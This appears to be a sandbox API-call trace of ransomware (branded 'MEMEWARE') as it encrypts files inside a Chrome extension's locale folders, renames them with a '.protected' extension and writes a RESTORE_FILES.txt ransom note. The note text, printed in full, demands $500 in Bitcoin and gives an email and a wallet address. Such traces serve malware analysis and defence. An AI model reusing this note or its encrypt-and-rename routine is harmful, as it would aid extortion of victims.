lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0081.047] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0081.047] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi") returned 145 [0081.047] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0081.047] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0081.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\*") returned 147 [0081.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.048] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.048] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.048] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\.") returned 147 [0081.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.048] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.048] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.048] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.048] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.048] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\..") returned 148 [0081.048] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.048] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.048] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.048] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.048] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.048] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.048] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.048] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.048] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.049] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.049] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0081.050] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.050] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x3ad, lpOverlapped=0x0) returned 1 [0081.051] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffc53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.051] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x3ad, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x3ad, lpOverlapped=0x0) returned 1 [0081.051] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.051] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.051] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.051] CloseHandle (hObject=0x168) returned 1 [0081.052] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.protected") returned 169 [0081.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.protected")) returned 1 [0081.052] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.052] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\RESTORE_FILES.txt") returned 163 [0081.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.053] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.053] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.054] lstrlenA (lpString="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") returned 684 [0081.054] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.054] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.054] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.054] CloseHandle (hObject=0x164) returned 1 [0081.054] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0081.054] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr") returned 145 [0081.054] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0081.054] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0081.054] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\*") returned 147 [0081.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.054] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.054] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.054] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.054] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.054] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\.") returned 147 [0081.055] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.055] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.055] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.055] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.055] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.055] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.055] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\..") returned 148 [0081.055] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.055] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.055] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.055] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.055] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.055] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.055] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.055] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.056] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.056] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.056] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x279, lpOverlapped=0x0) returned 1 [0081.065] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.066] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x279, lpOverlapped=0x0) returned 1 [0081.066] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.066] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.066] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.066] CloseHandle (hObject=0x168) returned 1 [0081.066] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.protected") returned 169 [0081.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.protected")) returned 1 [0081.067] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.067] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.067] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\RESTORE_FILES.txt") returned 163 [0081.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.068] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.068] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.069] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.069] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.069] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.069] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.069] CloseHandle (hObject=0x164) returned 1 [0081.069] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0081.069] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu") returned 145 [0081.069] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0081.069] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0081.069] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\*") returned 147 [0081.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.070] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.070] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.070] 